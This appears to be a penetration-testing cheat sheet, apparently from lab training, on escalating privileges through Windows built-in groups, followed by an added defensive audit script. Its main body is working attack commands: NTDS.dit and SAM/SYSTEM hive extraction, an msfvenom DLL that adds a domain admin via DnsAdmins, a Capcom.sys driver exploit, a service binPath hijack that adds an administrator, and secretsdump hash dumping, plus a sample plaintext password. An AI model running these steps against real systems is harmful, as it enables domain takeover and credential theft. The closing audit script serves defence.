Windows Group Privileges
Backup Operators
Membership of this group grants its members the SeBackup and SeRestore privileges.
https://github.com/giuliano108/SeBackupPrivilege
1 Import DLLs
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
2 Enable SeBackupPrivilege
# Enable
Set-SeBackupPrivilege
# Verify
Get-SeBackupPrivilege
3 Copy File
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
Copy NTDS.dit
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
Backup SAM + SYSTEM Hives
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
Extract NTDS
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
Event Log Reader
Check Group Membership
net localgroup "Event Log Readers"
Searching Security Logs
# Without Credentials
wevtutil qe Security /rd:true /f:text | Select-String "/user"
# With Credentials
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
DnsAdmins
1 Generating Malicious DLL
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
2 Load DLL
dnscmd.exe /config /serverlevelplugindll adduser.dll
3 Restart Service
sc stop dns
sc start dns
Print Operators
Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.
https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp
1 Compile CPP File
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
2 Add Capcom.sys
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
3 Verify Privilege Is Enabled
EnableSeLoadDriverPrivilege.exe
4 Run Exploit
https://github.com/tandasat/ExploitCapcom
.\ExploitCapcom.exe
Server Operators
Membership allows users to administer Windows servers without being granted Domain Admin privileges. It is a very highly privileged group whose members can log in locally to servers, including Domain Controllers.
1 Query Service
# Check whether the service runs as SYSTEM
sc qc AppReadiness
2 Service Permissions Check
https://learn.microsoft.com/en-us/sysinternals/downloads/psservice
c:\Tools\PsService.exe security AppReadiness
3 Modify Service Binary Path
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
4 Start / Stop Service
sc stop AppReadiness
sc start AppReadiness
5 Dump Hashes
secretsdump.py [email protected] -just-dc-user administrator
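As an added defensive check that is not part of the original notes: a PowerShell audit that enumerates members of the five groups covered above and looks for the DNS plugin DLL and the modified AppReadiness service path described in the DnsAdmins and Server Operators steps. It assumes the ActiveDirectory RSAT module is installed and that it runs in an elevated session on a host with the DNS and AppReadiness services (the expected svchost.exe path is an assumption and may differ by Windows version).

```powershell
# Added audit script, not from the original notes. Flags membership of the
# privileged groups discussed above and two persistence points those groups can set.
Import-Module ActiveDirectory

$groups = 'Backup Operators', 'Event Log Readers', 'DnsAdmins', 'Print Operators', 'Server Operators'

# 1. Group membership: these groups should normally be empty or tightly scoped.
foreach ($g in $groups) {
    $members = Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue
    if ($members) {
        Write-Output "[!] $g has $($members.Count) member(s): $($members.SamAccountName -join ', ')"
    } else {
        Write-Output "[+] $g is empty"
    }
}

# 2. DnsAdmins abuse: a ServerLevelPluginDll value means dns.exe loads that DLL on restart.
$dnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$plugin = (Get-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
if ($plugin) {
    Write-Output "[!] DNS ServerLevelPluginDll is set: $plugin"
} else {
    Write-Output "[+] No DNS ServerLevelPluginDll configured"
}

# 3. Server Operators abuse: AppReadiness runs as LocalSystem, so its binPath must still be svchost.
#    Expected-path prefix is an assumption; adjust to the baseline of your build.
$svc = Get-CimInstance Win32_Service -Filter "Name='AppReadiness'"
if ($svc) {
    if ($svc.PathName -notmatch '^"?C:\\Windows\\System32\\svchost\.exe') {
        Write-Output "[!] AppReadiness binPath is not svchost (runs as $($svc.StartName)): $($svc.PathName)"
    } else {
        Write-Output "[+] AppReadiness binPath unchanged: $($svc.PathName)"
    }
}
```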